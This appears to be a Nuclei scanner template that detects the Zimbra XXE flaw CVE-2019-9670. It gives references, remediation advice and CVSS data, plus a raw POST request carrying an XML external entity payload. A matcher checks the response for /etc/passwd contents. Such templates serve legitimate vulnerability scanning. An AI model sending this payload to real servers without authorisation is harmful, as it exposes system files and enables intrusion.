id: CVE-2019-9670 info: name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection author: ree4pwn severity: critical description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component. remediation: | Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46693/ - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - https://bugzilla.zimbra.com/show_bug.cgi?id=109129 - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9670 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 epss-score: 0.97216 epss-percentile: 0.99791 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor http: - raw: - | POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml ]> aaaaa &xxe; matchers-condition: and matchers: - type: regex part: body regex: - 'root:.*:0:0:' - "Problem accessing" condition: and - type: status status: - 503 # digest: 4b0a00483046022100a478872d292e77c8ed53a14bec716a0d853648a38ccb73e83a2a1b3b275b258e022100a225a606dbf407a8c3bac264bde35019c999a6f5e2961055dca8da40116ffbf7:922c64590222798bb761d5b6d8e72950